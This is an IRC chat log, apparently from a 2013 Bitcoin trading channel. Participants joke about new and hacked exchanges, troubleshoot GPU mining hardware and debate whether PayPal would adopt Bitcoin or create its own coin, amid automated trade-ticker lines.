BTC [-] Apr 24 23:08:33 what up Apr 24 23:08:51 skateboards got haxed Apr 24 23:09:34 mircea_popescu: wat no Apr 24 23:10:20 [BTCTC] [BTC-BOND] 20 @ 0.01 = 0.2 BTC [+] Apr 24 23:15:30 o jesus Apr 24 23:15:32 http://bex.io/ Apr 24 23:16:01 haha Apr 24 23:16:21 remind me of that 'you can do anything video' Apr 24 23:16:23 reminds Apr 24 23:16:45 http://www.youtube.com/watch?v=gSjLiQxEZlM Apr 24 23:17:13 [BTCTC] [ASICMINER-PT] 1 @ 1.14395 BTC [-] Apr 24 23:17:37 [BTCTC] [ASICMINER-PT] 1 @ 1.144 BTC [+] Apr 24 23:18:51 wat Apr 24 23:19:05 [BTCTC] [ASICMINER-PT] 1 @ 1.144 BTC [+] Apr 24 23:19:10 [BTCTC] [ASICMINER-PT] 7 @ 1.145 = 8.015 BTC [+] Apr 24 23:19:46 kakobrekla: skateboards! Apr 24 23:20:01 seriously MJR_, where have you been Apr 24 23:20:07 ;;seen davout Apr 24 23:20:07 davout was last seen in #bitcoin-assets 4 hours, 14 minutes, and 32 seconds ago: because skateboards Apr 24 23:20:16 i've been on here all day Apr 24 23:20:19 just working a lot Apr 24 23:20:30 lol Apr 24 23:20:31 mircea_popescu apparently they still work. Apr 24 23:20:32 Ilya is an Erlang/Elixir developer with over 12 years experience as a helpdesk team leader Apr 24 23:20:43 i requested an invite Apr 24 23:20:47 the more exchanges the merrier Apr 24 23:20:53 whats up guys Apr 24 23:21:07 lol "you can do anything!" Apr 24 23:21:11 anyone know how to unsubscribe from a mt gox channel (socket.io API) Apr 24 23:22:05 [HAVELOCK] [SDICE] 1 @ 0.285 BTC [+] Apr 24 23:23:10 lol "I've never been punched!" Apr 24 23:26:59 [BTCTC] [ASICMINER-PT] 1 @ 1.145 BTC [+] Apr 24 23:29:32 [BTCTC] [ASICMINER-PT] 1 @ 1.145 BTC [+] Apr 24 23:31:11 MJR_: `route add 72.52.5.0/24 127.0.0.1` <<< should do the trick Apr 24 23:32:21 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Apr 24 23:34:05 ;D Apr 24 23:36:20 mod6: lol Apr 24 23:37:30 lulz, I just read the Trilema blog << there's like... i dunno, 7000 articles ? i doubt you read it all :D Apr 24 23:38:11 oh yeah, the one about African American housing Apr 24 23:38:19 or w/e Apr 24 23:38:48 the life and times. Apr 24 23:39:12 it's hard being so awesome sometimes, ain't it? Apr 24 23:39:28 notrly! Apr 24 23:39:29 LoL, haters Apr 24 23:40:00 lol Apr 24 23:40:17 ThickAsThieves i have a lot of practice see. Apr 24 23:40:29 If people read what you say, and not what they want it to say. You are actually being very polite most of the time Apr 24 23:41:02 they just are not smart enough to read properly Apr 24 23:41:09 jborkl it's very hard, this. probably the hardest thing in the world. in the end all science can be reinterpreted as a desperate and ultimately doomed attempt to read what nature says Apr 24 23:41:15 rather than what we'd think it does. Apr 24 23:42:27 i figured it out Apr 24 23:42:38 you just need to use JSON.stringify on the message first... Apr 24 23:44:40 ok that bex.io thing is scaery. Apr 24 23:46:26 Holy fuck, that is the worst idea I have ever heard of Apr 24 23:46:38 [BTCTC] [ASICMINER-PT] 2 @ 1.1439 = 2.2878 BTC [-] Apr 24 23:46:43 nothing but baglog here i tell you Apr 24 23:46:47 eh Apr 24 23:46:50 backlog Apr 24 23:46:51 what is scary about bex.io? Apr 24 23:47:02 css Apr 24 23:47:39 lol Apr 24 23:47:53 isn't that the same library all those kind of guys are using now? Apr 24 23:48:26 hmm? Apr 24 23:48:44 And we <3 Bitcoin. Apr 24 23:48:52 well that makes it ok Apr 24 23:48:58 ya well, i <4 bitcoin. Apr 24 23:49:01 haha jborkl Apr 24 23:49:40 hahaha Apr 24 23:51:26 ahahah <4 Apr 24 23:51:29 so im trying to setup my third video card in my p55 motherboard - however its not working, two of ANY of the video cards work, but when i power up 3, one of the cards is disabled / issues (OpenCL / ADL hardware detection issues_ Apr 24 23:51:38 any clues? Apr 24 23:51:42 yes Apr 24 23:51:48 could it be motherboard power related? Apr 24 23:51:51 this is so well known even i have heard of it Apr 24 23:52:00 there's a controller limit which only allows 2 cards at a time Apr 24 23:52:15 hack? Apr 24 23:52:37 not any very good ones. most miners have issues with this ending up with very speciffic mb / card combos because of it Apr 24 23:52:44 getting a tricard setup to work is nontrivial. Apr 24 23:53:09 [BTCTC] [ASICMINER-PT] 1 @ 1.117 BTC [-] Apr 24 23:53:59 [BTCTC] [COGNITIVE] 6 @ 0.19809 = 1.1885 BTC [-] Apr 24 23:56:11 actually Apr 24 23:56:18 its just as likely you dont have enough power Apr 24 23:56:53 try a bigger PSU Apr 24 23:56:56 or two PSUs Apr 24 23:56:59 if you use two Apr 24 23:57:09 you need to short circuit the cable on one Apr 24 23:57:14 or buy a special cable Apr 24 23:57:18 from cablesaurus Apr 24 23:57:34 http://cablesaurus.com/Dual-PSU-24-Pin-Adapter-Cable Apr 24 23:58:00 easy enough , like you said to short it - just one wire Apr 24 23:59:44 mircea_popescu, :( Apr 25 00:00:43 https://bitcointalk.org/index.php?topic=181168.0 Apr 25 00:00:47 o hey, nice fresh drama Apr 25 00:02:56 Did folks see this? http://thenextweb.com/insider/2013/04/24/paypal-president-is-fascinated-by-bitcoin-says-company-is-thinking-about-including-the-virtual-currency/ Apr 25 00:03:00 this drama is not tasty enough Apr 25 00:03:06 yes Apr 25 00:03:09 bgupta yeah. Apr 25 00:03:26 paypal could "brand" bitcoin as their own Apr 25 00:03:36 and resist cannibilizing themselves Apr 25 00:03:39 but i doubt it Apr 25 00:03:53 cannibalizing Apr 25 00:04:21 more likely we'd see palcoin or such Apr 25 00:04:26 ppcoin Apr 25 00:04:28 hehehe Apr 25 00:04:30 :) Apr 25 00:05:07 western union is probably in a better position Apr 25 00:05:29 i question whether either is agile enough to do anything at all though Apr 25 00:10:08 [HAVELOCK] [SDICE] 4 @ 0.292 = 1.168 BTC [+] Apr 25 00:10:09 [HAVELOCK] [SDICE] 43 @ 0.2924 = 12.5732 BTC [+] Apr 25 00:19:06 https://twitter.com/bitcoin_central/status/327131323342942209 Apr 25 00:19:13 seems ovh owned slush AND bitcoin-central. Apr 25 00:19:37 [BTCTC] [ASICMINER-PT] 1 @ 1.14299 BTC [+] Apr 25 00:22:39 shoulda used godaddy Apr 25 00:22:47 they wont let you change shit Apr 25 00:23:33 lol Apr 25 00:46:05 [HAVELOCK] [VTX] 6 @ 0.4182 = 2.5092 BTC [-] Apr 25 00:46:07 [HAVELOCK] [VTX] 3 @ 0.41810001 = 1.2543 BTC [-] Apr 25 00:50:59 that tweet just staggers the imagination Apr 25 00:51:27 lol Apr 25 00:51:29 wow Apr 25 00:52:06 just saw something on tv...now that AP's twitter feed was hacked maybe someone will start caring about security more... Apr 25 00:52:15 and i use the term "hacked" very very loosely Apr 25 00:53:07 i wouldnt expect that Apr 25 00:54:13 MJR: twitter is very serious business :v Apr 25 00:54:38 lol Apr 25 00:54:47 oh, were you guys not aware... Apr 25 00:55:10 haha Apr 25 00:55:18 that tweet moved the US equity market 136 billion dollars Apr 25 00:55:33 so...kinda serious business Apr 25 00:55:53 not really, it's just marketing for twitter Apr 25 00:56:10 flash crashes happen and are corrected Apr 25 00:56:12 it happens Apr 25 00:56:15 just saying...of course they do and are Apr 25 00:56:23 o.O Apr 25 00:57:37 the paypal thing makes me wonder: what happens when someone with serious meatspace pull starts an altchain? Apr 25 00:59:28 asciilifeform: well...if they have serious pull, then they will have a centralized system more than likely...which probably negates bitcoins biggest advantage Apr 25 00:59:58 so, either they create a distributed system they don't control...which means its exactly like bitcoin but 4 years late to the party Apr 25 01:00:18 or they create something they control, and it completely misses the point Apr 25 01:00:42 MJR_: you can profit from an altchain without controlling it (in the sense that Warcraft gold is controlled) - simply through pre-mining. Apr 25 01:00:58 well...that is what ripple did Apr 25 01:01:11 and most people i've talked to dislike the fact that the coins were premined Apr 25 01:01:19 among ripples other problems Apr 25 01:02:00 but the fact remains, that if you don't control the system, it probably won't be very profitable for a company, and if you do control it, bitcoin will remain unique Apr 25 01:02:09 my prediction: PayPal will take 'paypalcoin' as deposits/withdrawals, and it will pre-mine the first million or so. they will say "take it or leave it," and plenty will take it. Apr 25 01:02:23 i think more will leave it Apr 25 01:02:29 what exactly would that benefit them? Apr 25 01:02:55 MJR_: free money Apr 25 01:02:58 you can currently fund paypal with dollars Apr 25 01:03:07 why would someone want to trust paypal with their money Apr 25 01:03:23 most people like bitcoin because they can leave paypal Apr 25 01:03:45 so maybe some will choose that, but i think you combine the technical difficulty of bitcoin with the centralization and control of the current system Apr 25 01:04:07 and if they do a blockchain like system, people will know how many coins they've premined Apr 25 01:04:10 paypal wants to live. so it will set itself up as a very odd sort of bitcoin exchange, where you have to buy into their scrip to play. Apr 25 01:04:14 if they don't...why trust them in the first place Apr 25 01:04:36 paypal won't do anything Apr 25 01:04:36 point is, bitcoin will remain unique Apr 25 01:04:41 they are too big Apr 25 01:04:54 ThickAsThieves: i agree...but theoretically if they wanted to, it'd be a waste of time Apr 25 01:04:57 there's like what, one agile big business? Apr 25 01:05:07 Google Apr 25 01:05:33 ebay is a de-facto monopoly, so an altcoin which one can use on ebay (via paypal) will have a serious advantage. Apr 25 01:05:39 how? Apr 25 01:05:43 i seriously don't get it Apr 25 01:05:51 i can use cash on ebay Apr 25 01:06:02 why would i change from cash to ebaycoin Apr 25 01:06:12 what benefit would it give me as a consumer? Apr 25 01:06:29 seems like most ebay users insist on electronic payment Apr 25 01:06:29 I personally use Chuck E Cheese tokens Apr 25 01:06:30 how would they get people to choose this product over cash? Apr 25 01:06:43 unless they decide to stop taking cash (srsly doubt that) Apr 25 01:07:05 yes...electronic cash Apr 25 01:07:13 which is what everyone uses for online shopping now Apr 25 01:07:32 colored coin ! Apr 25 01:07:32 the advantage Apr 25 01:07:36 would be in the fees Apr 25 01:07:51 so what benefit would a consumer have to say "it's the same price either way, i want to complicate the process of buying something" Apr 25 01:07:55 fees for the company Apr 25 01:08:04 so you lower fees for the consumer Apr 25 01:08:05 paypal could undermine the credit card industry Apr 25 01:08:10 yes, but why would i carfe Apr 25 01:08:11 care Apr 25 01:08:20 because you'd pay less fees Apr 25 01:08:27 good for them, you made more money, still don't see a value proposition Apr 25 01:08:38 how would i get cash INTO their coins? Apr 25 01:08:39 saving money is not a value? Apr 25 01:08:50 how does the cash get converted to their coins Apr 25 01:08:57 i pay the fees there Apr 25 01:09:16 and then get to buy something slightly cheaper, after using more time and adding complexity Apr 25 01:09:35 you need expand your perspective Apr 25 01:09:51 yknow how people are trying bitcoin credit cards? Apr 25 01:09:56 paypal could take that over Apr 25 01:10:10 i'm telling you...if you are saying that the pool of available value is the fees that ebay will not pay credit cards...then they will want a big piece of that Apr 25 01:10:22 they are already making inroads by releasing paypal credit cvards Apr 25 01:10:32 Why would you need a bitcoin credit card- just use a phone with NFC or scan to send Apr 25 01:10:34 but, you haven't in any way made the process better for the consumer because I will just use my credit card to buy your ebaycoins Apr 25 01:10:54 *We* dont need any of this Apr 25 01:11:01 but joe sixpack might Apr 25 01:11:04 ThickAsThieves: so if i can have a bitcoin credit card (which I know they are working on) then why would i choose to use ebaycoins Apr 25 01:11:24 point is, these "alt chains" exist and have for quite some time Apr 25 01:11:26 ;;ticker Apr 25 01:11:27 BTCUSD ticker | Best bid: 151.19991, Best ask: 151.19992, Bid-ask spread: 0.00001, Last trade: 151.19991, 24 hour volume: 233424.28099254, 24 hour low: 140.20000, 24 hour high: 166.43438, 24 hour vwap: 151.56597 Apr 25 01:11:30 they are called frequent flier miles Apr 25 01:11:35 its a branding and positioning conversation Apr 25 01:11:35 rewards points Apr 25 01:11:45 not just about value comparisons Apr 25 01:11:55 there is nothing they are doing that is new or useful by creating an alt chain Apr 25 01:12:08 oh yeah, gift cards too Apr 25 01:12:08 [BTCTC] [ASICMINER-PT] 1 @ 1.143 BTC [+] Apr 25 01:12:11 we should ban altcoins Apr 25 01:12:14 nah Apr 25 01:12:22 well they dont even NEED to do it as an alt Apr 25 01:12:31 they could just legitimize bitcoin Apr 25 01:12:34 true Apr 25 01:12:39 but therein lies the difference Apr 25 01:12:48 adopting bitcoin makes sense Apr 25 01:12:53 not exactly Apr 25 01:12:55 you will save fees Apr 25 01:13:02 and have faster clearing Apr 25 01:13:08 Paypal isnt gonna trust their money with Luke-Jr Apr 25 01:13:10 sorry Apr 25 01:13:11 lol Apr 25 01:13:14 there is my point Apr 25 01:13:33 who the fuck cares about paypal? Apr 25 01:13:35 public transactioin record can be interesting.. but what about chargebacks? Apr 25 01:13:40 bitcoin either remains unique in its decentralization, or someone creates an identical system that doesn't add value Apr 25 01:13:57 mod6: i don't even think paypal cares about paypal Apr 25 01:14:00 lol Apr 25 01:14:05 anyways, thats my point Apr 25 01:14:09 amazon already has amazoncoins Apr 25 01:14:11 its just a conversation Apr 25 01:14:11 no one cares Apr 25 01:14:16 it wont bite Apr 25 01:14:20 amazoncoins arent coins Apr 25 01:14:23 they're xbox live points Apr 25 01:14:26 its not the same thing Apr 25 01:14:28 which is what i am saying Apr 25 01:14:41 you can create customer rewards programs all day long...that is not bitcoin Apr 25 01:14:42 this is why paypal would consider an altcoin Apr 25 01:14:44 before bitcoin Apr 25 01:14:46 i just started mining bytecoins! Apr 25 01:14:51 http://youtu.be/h5tcAXMDxfY Apr 25 01:15:32 my point is...paypal won't say "we can create a customer rewards point system, but let's do it in the most confusing and difficult way as opposed to just creating a new table in a database" Apr 25 01:15:33 they make palcoins to have the features of bitcoin, without the risks of how bitcoin is run Apr 25 01:15:51 the biggest feature of bitcoin is that paypal doesn't control it! Apr 25 01:15:55 (dont forget i started my comments with, paypal won't do shit) Apr 25 01:16:00 good point Apr 25 01:16:13 the beautiful thing that makes bitcoin great is that NO ONE runs it Apr 25 01:16:20 thats not true at all Apr 25 01:16:29 the minute someone says "i run this" you just completely missed the point Apr 25 01:16:33 teh devs and miners run it Apr 25 01:16:37 and gox Apr 25 01:16:41 no... Apr 25 01:16:48 you can tell yourself that Apr 25 01:16:49 they adopted a protocol that they don't control Apr 25 01:17:00 i'm a miner, i think i should get 100 coins for this block Apr 25 01:17:09 i "control" this system don't I? Apr 25 01:17:14 lol Apr 25 01:17:18 exactly Apr 25 01:17:19 dont jump to extremes Apr 25 01:17:21 MJR_: are you on drugs? Apr 25 01:17:27 no...not yet at least Apr 25 01:17:28 or do you just like shitting out strawmans? Apr 25 01:17:33 hahahaha Apr 25 01:17:48 my point is that a decentralized system can be said to be run by everyone, or no one, same difference Apr 25 01:18:14 but seriuosly, if i control it, i can say "i want more than 21 million" or "you can't use it on silk road" Apr 25 01:18:20 etc Apr 25 01:18:23 bitcoin WANTS to be decentralized Apr 25 01:18:34 but needed to be under control to actually get off the ground Apr 25 01:18:37 the protocol can be implemented by anyone anywhere Apr 25 01:18:48 huh? it is off the ground...and it isn't under anyone's control Apr 25 01:19:00 cmon Apr 25 01:19:02 really? Apr 25 01:19:27 its been around for 4 years...its still small, but any company that had the run that bitcoin has would be pretty happy Apr 25 01:19:31 so who caused AND fixed the fork Apr 25 01:19:38 everyone? Apr 25 01:19:43 lol, they suggested that people move back and those people agreed Apr 25 01:19:49 they didn't have to Apr 25 01:19:57 devs and mining pools did it Apr 25 01:20:03 you had no say Apr 25 01:20:06 i had no say Apr 25 01:20:06 perhaps we need to understand what "control" means Apr 25 01:20:16 no Apr 25 01:20:23 you want it to mean total control Apr 25 01:20:29 if one of those people controlled it, they wouldn't have had to ask Apr 25 01:20:40 devs dont need to ask Apr 25 01:20:43 and you could have kept on mining the longer chain until it became invalid Apr 25 01:20:48 devs did ask Apr 25 01:20:49 they barely need to ask each other Apr 25 01:20:53 huh? Apr 25 01:20:59 they turned off the miners machines? Apr 25 01:21:06 they didn't have to ask the mining pool operators Apr 25 01:21:12 There are currently 159761.04 bitcoins demanded at or over 50.0 USD, worth 14120174.0375 USD in total. | Data vintage: 0.0096 seconds Apr 25 01:21:12 they just turned them off themselves Apr 25 01:21:16 they didnt have to change the software either Apr 25 01:21:24 you don't have to use the software they create Apr 25 01:21:28 There are currently 57796.802 bitcoins demanded at or over 100.0 USD, worth 7146181.94725 USD in total. | Data vintage: 16.2669 seconds Apr 25 01:21:35 bitcoin is a protocol Apr 25 01:21:36 There are currently 47694.042 bitcoins offered at or under 200.0 USD, worth 8461014.99825 USD in total. | Data vintage: 24.4125 seconds Apr 25 01:21:42 anyone can write their own software Apr 25 01:21:43 There are currently 57833003 bitcoins demanded at or over 0.0 USD, worth 19845908.6143 USD in total. | Data vintage: 31.6619 seconds Apr 25 01:21:48 yes Apr 25 01:21:58 There are currently 74644.128 bitcoins offered at or under 250.0 USD, worth 14832772.4797 USD in total. | Data vintage: 46.1288 seconds Apr 25 01:22:00 so what do the devs control? their implementation of the bitcoin protocol Apr 25 01:22:05 fine Apr 25 01:22:19 and whomever trusts their latest version Apr 25 01:22:22 or influence Apr 25 01:22:22 what do mining pool operators control? the hashes they produce...no biggie Apr 25 01:22:29 that is the key word Apr 25 01:22:30 influence Apr 25 01:22:31 how is it not a biggie? Apr 25 01:22:45 they "saved bitcoin" Apr 25 01:22:48 i can ask, suggest, beg, demand...but i can't FORCE Apr 25 01:23:23 control only requires the ability to manipulate the controls Apr 25 01:23:27 not break them Apr 25 01:23:29 and if everyone decides to go in one direction, i can mine my own forked chain and have my own little world...or i can go with the majority Apr 25 01:23:53 sounds like a great format for paypal to trust Apr 25 01:23:53 no...that is like saying that since I can vote in elections I control who is president of the US Apr 25 01:24:06 ... Apr 25 01:24:14 the point is, they had to ask at every step of the way Apr 25 01:24:28 next time the pool operators could say no Apr 25 01:24:32 that is the point Apr 25 01:24:35 who did the devs ask about releasing .8? Apr 25 01:24:44 they released THEIR software Apr 25 01:24:55 they are allowed to release whatever they want Apr 25 01:24:56 and the pools ate it up Apr 25 01:25:00 you can choose to download it, or not Apr 25 01:25:06 anyway Apr 25 01:25:14 if you want bitcoin to be decentralized Apr 25 01:25:16 last i checked they didn't come to your house and install it without your consent Apr 25 01:25:23 it needs to have an exchange built into it somehow Apr 25 01:25:31 huh? Apr 25 01:25:31 they don't? who the hell was that guy then?!? Apr 25 01:26:17 if people still follow software upgrades Apr 25 01:26:24 it is not decentralized Apr 25 01:26:32 uh.. Apr 25 01:26:49 maybe there is some confusion about what decentralized means in the bitcoin context Apr 25 01:26:58 i see it as Apr 25 01:27:18 the ability for a party to manipulate it enought to affect all users Apr 25 01:27:23 are you saying bitcoin isn't decentralized, because all the clients follow the same protocol? Apr 25 01:27:29 er.. bittorrent, i mean Apr 25 01:27:36 either way Apr 25 01:27:38 same difference Apr 25 01:27:40 same point Apr 25 01:27:41 because there are a handful of people deciding its fate Apr 25 01:27:51 that's not what decentralized vs centralized means though Apr 25 01:28:16 just because a handful of ppl decide something's fate, doesn't mean it can't be a decentralized system Apr 25 01:28:28 it can be one but not act like one Apr 25 01:28:32 i suppose Apr 25 01:28:51 how would you define a decentralized system that acts like one in your mind then? Apr 25 01:28:59 can you give any examples of such a thing existing? Apr 25 01:29:11 hmm Apr 25 01:30:20 i can find holes in any example that comes to mindf Apr 25 01:30:20 Define "decentralized" system. Apr 25 01:30:28 yeah, exactly Apr 25 01:30:49 It is not central to what? Apr 25 01:30:53 i think your idea of a "perfect decentralized system" doesn't exist really Apr 25 01:30:57 not centrally controlled Apr 25 01:30:58 because it's too abstract Apr 25 01:31:15 So there is no control? Apr 25 01:31:16 and you are abstracting what "centralized" vs "decentralized" means far too much Apr 25 01:31:29 go troll -dev Apr 25 01:31:36 but the conversation did move to that Apr 25 01:31:55 mainly i was saying that devs have ability to ruin bitcoin Apr 25 01:32:00 and mjr disagreed Apr 25 01:32:28 anywho Apr 25 01:32:30 i'll stop Apr 25 01:34:27 So, no more debate? Apr 25 01:34:43 got too semantic Apr 25 01:34:55 Someone told me that IRC is where the most important subjects related to Bitcoin are discussed. Apr 25 01:35:05 [HAVELOCK] [VTX] 7 @ 0.4548 = 3.1836 BTC [+] Apr 25 01:35:10 "most important" Apr 25 01:35:14 this room has been kinda dead lately Apr 25 01:35:32 too much ppl Apr 25 01:35:56 there arent too many people in here compared to otc Apr 25 01:36:06 or bitcoin-anal Apr 25 01:36:18 haha Apr 25 01:36:40 turns out the bitcoin-anal crew actually are a little anal Apr 25 01:36:40 they actually seem to like discussing things in there Apr 25 01:36:56 what is bitcoin-anal? Apr 25 01:36:59 its half noobs and half chart firends Apr 25 01:37:02 analysis Apr 25 01:37:02 fiends* Apr 25 01:37:14 sorry had to run downstairs Apr 25 01:37:30 anyway, my point is that a free market is the most efficient system so far Apr 25 01:37:48 so, bitcoin is closest to that ideal...if people don't like the devs, they will build their own software Apr 25 01:37:56 (this is extremely likely) Apr 25 01:38:07 if you build it, they will come Apr 25 01:38:16 please no more litecoin clones Apr 25 01:38:16 if people don't like the mining pools decisions, they will join a different one Apr 25 01:38:34 think of HTTP or SMTP before modern clients, guys either used something like lynx or elm Apr 25 01:38:39 will take some big mistakes along the way Apr 25 01:38:41 Scrat: no, not an alt chain...you can build bitcoin software yourself Apr 25 01:39:03 mod6: exactly Apr 25 01:39:47 http is a protocol, i can write a browser to use that protocol Apr 25 01:39:47 eventually they'll get us that spec and some more dev's will be off to the races on their own client Apr 25 01:40:09 the conversation did stem from how an entity like Paypal would never touch bitcoin because of these factors Apr 25 01:40:15 saying that the guys who made netscape navigator could have ruined the internet is pretty unlikely Apr 25 01:40:37 no, ie6 almost ruined it :D Apr 25 01:40:37 not comparable Apr 25 01:40:50 jurov: LOL yeas Apr 25 01:40:57 it is exactly the same thing Apr 25 01:40:59 lol or netscape6 ... eek! Apr 25 01:41:02 a protocol Apr 25 01:41:05 nutscrape sucked Apr 25 01:41:05 the pain and suffering "shivers" Apr 25 01:41:05 [HAVELOCK] [VTX] 6 @ 0.4548 = 2.7288 BTC [+] Apr 25 01:41:08 Free market is not a "system"... Apr 25 01:41:12 it is Apr 25 01:41:15 *shivers* Apr 25 01:41:18 From where you got that? Apr 25 01:41:19 v0.8 almost ruined it Apr 25 01:41:32 i just started the channel #bitcoin-anal, everyobody's welcome to come Apr 25 01:41:43 come in you anal? Apr 25 01:41:47 A free market is a market structure in which the distribution and costs of goods and services, along with the structure and hierarchy between capital and consumer goods, are coordinated by supply and demand unhindered by external regulation or control by government or monopolies Apr 25 01:41:48 call MP Apr 25 01:41:48 yes it will be fun Apr 25 01:41:50 haha Apr 25 01:41:55 i prefer #bitcoin-circlejerk Apr 25 01:42:03 too unnatural sorry Apr 25 01:42:03 those are for the alt-coins Apr 25 01:42:07 ;;ud circlejerk Apr 25 01:42:08 http://www.urbandictionary.com/define.php?term=circlejerk | To kneel in a circle with others and pleasure oneself. Also refers to a pompous, self-congratulatory discussion where little to no progress is made. Apr 25 01:42:11 that is basically describing a system Apr 25 01:42:17 ;;ud paleface Apr 25 01:42:17 http://www.urbandictionary.com/define.php?term=paleface | A common term used by native Americans to classify white people. Apr 25 01:42:25 Right, and what exactly the "free" means in all that structure? Apr 25 01:42:43 it means that there is no external regulation Apr 25 01:42:50 free... Apr 25 01:42:57 that word should be banned Apr 25 01:43:00 within this system, everyone is able to impact it as much as they can Apr 25 01:43:17 guys, getting semantic about everything is worse than a circlejerk Apr 25 01:43:21 your ability to impact it is only limited by YOUR ability to impact it Apr 25 01:43:30 i'm not trying to get semantic Apr 25 01:43:33 but i agree totally Apr 25 01:43:35 i am Apr 25 01:43:41 Free of external regulation? But what boundaries define what is out and what is in? Apr 25 01:43:42 /o\ Apr 25 01:43:45 lol Apr 25 01:43:47 what is a system? what is free? what is is? Apr 25 01:43:51 hahaha Apr 25 01:43:53 good point Apr 25 01:44:04 point is, competition... Apr 25 01:44:06 the answer lies in...#bitcoin-anal Apr 25 01:44:15 Everyone gets it in the end Apr 25 01:44:17 i dont do anal Apr 25 01:44:18 hehehe Apr 25 01:44:21 I think this concept of "free" market is just a fictional idea... Apr 25 01:44:24 and it isn't always most effective anyway. Apr 25 01:44:25 does -anal come with fees? Apr 25 01:44:32 in one way or another, jack Apr 25 01:44:37 ;D Apr 25 01:44:42 lol Apr 25 01:45:11 well...since i said it is a system, which is what you disagreed with, systems are abstract concepts...the current implementation of our economy has some features that are based on a free market economy Apr 25 01:45:22 join #bitcoin-analysis more discussions that you desire imo Apr 25 01:45:52 anyway, since anyone can create software to use the bitcoin protocol, people will create the best one, as long as its worthwhile for them Apr 25 01:45:58 careful, if you arent predicting where the price is going, btc-anal crew gets antsy Apr 25 01:46:15 since anyone can start a mining pool, the best mining pool will win Apr 25 01:46:24 etc Apr 25 01:46:32 Thank you by the tip, I am lost in the Freenode server... Apr 25 01:46:33 everyone is free to compete with everyone Apr 25 01:46:41 nope.easiest one will win Apr 25 01:46:45 yea there are many channels for bitcoin Apr 25 01:46:46 ^ Apr 25 01:46:57 lol, bitcoin is slowly taking over freenode Apr 25 01:47:31 or the most promoted pool, or the 'coolest' pool Apr 25 01:47:33 yea. "don't call me skynet. i'm gribble." Apr 25 01:47:46 ;;gribble Apr 25 01:47:46 yes I am gribble. why do you keep bothering me? Apr 25 01:47:49 if your promotion or your marketing cause you to get the most people to join, its the best Apr 25 01:47:53 im not sure what the discussion was about, free market rules in bitcoin? Apr 25 01:48:08 its about nothing at this point Apr 25 01:48:19 about cats Apr 25 01:48:25 basically...decentralized vs centralized (why a coin controlled by paypal is pointless, and if they don't control it, they are not adding any value) Apr 25 01:48:37 started with whether paypal would use bitcoin somehow, or make their own coin Apr 25 01:48:40 and whether or why Apr 25 01:48:57 hmmm Apr 25 01:49:05 why does bitcoin ned to be controlled... Apr 25 01:49:08 need Apr 25 01:49:09 it doesn't Apr 25 01:49:12 it doesnt Apr 25 01:49:18 [BTCTC] [BTC-GOLD] 1 @ 0.0099 BTC [-] Apr 25 01:49:27 [BTCTC] [BTC-GOLD] 1 @ 0.008 BTC [-] Apr 25 01:49:31 that is the best feature of it in my opinion, that it isn't controlled Apr 25 01:49:40 except that it sorta is Apr 25 01:49:45 :P Apr 25 01:49:46 again...? Apr 25 01:49:47 aw shutup Apr 25 01:50:03 i like paypal, its very user friendly Apr 25 01:50:05 [HAVELOCK] [VTX] 1 @ 0.4548 BTC [+] Apr 25 01:50:07 [HAVELOCK] [VTX] 6 @ 0.4548 = 2.7288 BTC [+] Apr 25 01:50:08 i think we just disagree on what control is Apr 25 01:50:20 paypal could make bitcoin "user friendly" Apr 25 01:50:32 how Apr 25 01:50:33 since i don't have to use bitcoin-qt, they don't control me Apr 25 01:50:45 and i agree that paypal accepting bitcoin could be a good thing Apr 25 01:50:51 by integrating it with their own system Apr 25 01:50:57 ^^agree Apr 25 01:51:05 [HAVELOCK] [VTX] 1 @ 0.4548 BTC [+] Apr 25 01:51:08 you dont need a wallet or to understand anything about bitcoin Apr 25 01:51:15 if paypal just adds it to your account Apr 25 01:51:17 point is, if i don't like paypal's policies i don't have to use them either Apr 25 01:51:38 if i want to send money to silk road, and paypal says no, i can still just do it myself Apr 25 01:52:00 if i don't like that paypal reverses transactions, i simply don't use them Apr 25 01:52:09 they could reverse bitcoin transactions if they hold the account Apr 25 01:52:17 some people would appreciate that Apr 25 01:52:25 good point Apr 25 01:52:30 paypal would make bitcoin more popular other than that.. Apr 25 01:52:42 it would Apr 25 01:52:57 i think it may even eventually be necessary for paypal to integrate with bitcoin Apr 25 01:53:13 but the point is that they are just as free as anyone else to adopt the protocol Apr 25 01:53:27 how could the network keep pace with all the transactions..as it is, it takes my btc 30 mins minimum Apr 25 01:53:28 paypal introcuding reversable transactions to "verfied" Xcoin accounts would be seen as a great feature to some Apr 25 01:53:39 paypal could mitigate that as well Apr 25 01:53:43 you could do that with bitcoins Apr 25 01:53:57 or any bank really Apr 25 01:54:00 visa transactions for instance get recorded at mind boggling speeds and numbers Apr 25 01:54:02 i just take it out of your account Apr 25 01:54:27 they can barely make computers/networks to keep up with them all Apr 25 01:54:27 you could also use bitcoins for fractional reserve banking Apr 25 01:54:31 i couldnt see bitcoin doing that Apr 25 01:54:39 bitcoin doesn't do anything Apr 25 01:54:41 it just exists Apr 25 01:54:51 dont the transactions go through the network Apr 25 01:54:52 everyone is free to do what they want with it Apr 25 01:54:55 or blockchain Apr 25 01:55:31 they dont have to if the coins are within a service Apr 25 01:55:34 yes, they do...and the network doesn't care what transactions you do...the point of anyone like paypal creating reversible transactions is that they hold your account...they don't need to put that on the blockchain Apr 25 01:55:39 like mt. gox currently does Apr 25 01:56:04 like every exchange does i think Apr 25 01:56:06 [HAVELOCK] [VTX] 19 @ 0.4548 = 8.6412 BTC [+] Apr 25 01:56:07 in fact, eventually a small portion of all transactions will go to the blockchain Apr 25 01:56:08 inluding BTCT, etc Apr 25 01:56:33 most will simply be accounting entries in businesses, the same way the current economy works Apr 25 01:56:34 everyone except satoshidice Apr 25 01:56:36 hehe Apr 25 01:56:40 for now... Apr 25 01:56:43 ;) Apr 25 01:56:46 indeed Apr 25 01:57:18 in fact, eventually a small portion of all transactions will go to the blockchain>> please elaborate Apr 25 01:57:26 so, if i can attract people to my bank, where i won't keep a bitcoin to back every bitcoin credit you have in your account...i can do that Apr 25 01:57:27 all im sayin is it takes a bunch of time for a bitcoin transaction to go through..credit card transactions are as fast as lightning Apr 25 01:57:41 mt gox transfers are fast as lightning Apr 25 01:57:57 ;;goxlag Apr 25 01:57:58 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 25 01:58:06 [HAVELOCK] [VTX] 3 @ 0.41750001 = 1.2525 BTC [-] Apr 25 01:58:07 [HAVELOCK] [VTX] 2 @ 0.4175 = 0.835 BTC [-] Apr 25 01:58:08 [HAVELOCK] [VTX] 2 @ 0.40001001 = 0.8 BTC 